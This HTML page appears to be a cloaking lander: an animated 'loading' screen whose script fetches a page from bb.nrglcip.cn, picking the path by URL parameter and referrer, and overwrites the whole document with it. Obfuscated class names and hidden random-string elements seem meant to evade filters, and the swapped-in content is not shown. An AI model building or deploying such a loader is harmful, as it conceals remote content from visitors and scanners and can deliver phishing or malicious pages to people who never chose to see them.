<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cnWtNwhEHV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cnWtNwhEHV .PALAOCu {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cnWtNwhEHV .content {
            line-height: 50px;
            text-align: center
        }

        .cnWtNwhEHV .img {
            width: 100%
        }

        .cnWtNwhEHV .g1iyeM5elqy {
            text-align: center
        }

        .cnWtNwhEHV .g1iyeM5elqy span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cnWtNwhEHV .g1iyeM5elqy span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cnWtNwhEHV .g1iyeM5elqy span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cnWtNwhEHV .g1iyeM5elqy span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cnWtNwhEHV .g1iyeM5elqy span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cnWtNwhEHV .g1iyeM5elqy span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cnWtNwhEHV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function N4qj6njelnofb(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ms9kuAt = N4qj6njelnofb('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ms9kuAt +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ms9kuAt +".html?a=share";
		}
		
        vmq0Fqd=url+"#"+new Date().getTime();
        vmq0Fqd && function() {
            $.get(vmq0Fqd, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >OBj8iWxJwFLAvjlxXX2x1</b>
<p  style='display:none'>ce4QgGlji4PWX1HUQsWYzppPkdCxuqqxbr88rhOsXWvt9YnFbOgREhHNVMhzkAQZwLPcuvyi7UC0x4agUFtUbp7CfG</p>
<a  href='#' style='display:none'>TG7VhfQGZ7Dp2K42YXSl0YK7ZaHAfiqI0WtuzGxR33YCj38g7vF6yOZGDKLjUxdmIs7NTeCrB6ci</a><div class="cnWtNwhEHV">
    <div class="PALAOCu">
        <div class="g1iyeM5elqy">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >AXzvgWUUYuuX4YrUi04NXtbflnbqjVnZW6HTLmPFLjUvQdTE</b>
<div style='display:none'>CFsDIcuoL2PQ7ERus6fFVL1K6Xn1aVuubQfj5JLWjvS5YHXdQ4</div>
<a  href='#' style='display:none'>zD2r4z7Bnqg2XnrKlKYFbWixLBxvDyWKolG7S7R963WSUNRMjVBhIpFvkIxB7O7rrzl0xkYl4sL25fDREnvVDCeDNxd2</a>
<ul style='display:none' >IR8BwSOFAVcAeC6W8jlbmChYiMeq8Cj5ZJ2K4TyBae6b7WOe32TRIjPfODsObrSW0nZI</ul></body>
</html>